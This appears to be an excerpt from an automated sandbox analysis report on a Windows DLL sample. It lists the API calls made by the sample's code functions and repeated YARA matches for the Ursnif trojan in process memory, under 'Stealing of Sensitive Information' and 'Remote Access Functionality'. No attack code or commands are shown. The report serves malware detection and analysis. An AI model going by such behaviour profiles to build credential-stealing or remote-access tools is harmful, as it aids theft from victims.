Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDC1ADA GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 0_2_6DDC1ADA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_02A79135 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 3_2_02A79135
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6DDC1F0E CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_6DDC1F0E

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.451946137.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.452051043.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.496928044.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445570350.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.452023874.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.452000205.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445487547.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445636875.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445602533.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445524931.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451869538.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.452038744.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.498068878.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445456909.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451977445.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451921011.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445424230.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445650161.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 452, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 2248, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.451946137.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.452051043.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.496928044.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445570350.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.452023874.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.452000205.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445487547.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445636875.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445602533.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445524931.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451869538.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.452038744.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.498068878.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445456909.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451977445.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.451921011.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445424230.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.445650161.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 452, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 2248, type: MEMORY